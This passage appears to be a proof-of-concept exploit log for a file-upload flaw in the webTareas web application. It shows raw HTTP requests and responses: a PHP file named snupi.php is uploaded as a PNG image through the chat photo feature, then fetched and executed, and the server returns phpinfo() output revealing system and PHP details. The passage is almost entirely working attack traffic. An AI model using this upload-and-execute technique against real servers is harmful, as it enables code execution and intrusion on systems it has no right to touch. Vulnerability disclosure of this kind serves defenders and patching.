PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="action"sendPhotos-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatTo"2-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatType"P-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"Content-Type: image/pngPNG[...]<?php phpinfo();?>[...]-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:27:41 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 661Connection: closeContent-Type: application/json{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}-----------------------------------------------------------------------------------------------------------------------See link: /files\/Messages\/7.php-----------------------------------------------------------------------------------------------------------------------Req:-----------------------------------------------------------------------------------------------------------------------GET /webtareas/files/Messages/7.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: image/avif,image/webp,*/*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:28:16 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 89945[...]<title>PHP 7.4.30 - phpinfo()</title>[...]<h1 class="p">PHP Version 7.4.30</h1></td></tr></table><table><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><tr><td class="e">Build Date </td><td class="v">Jun  7 2022 16:22:15 </td></tr><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]

Tag

#firefox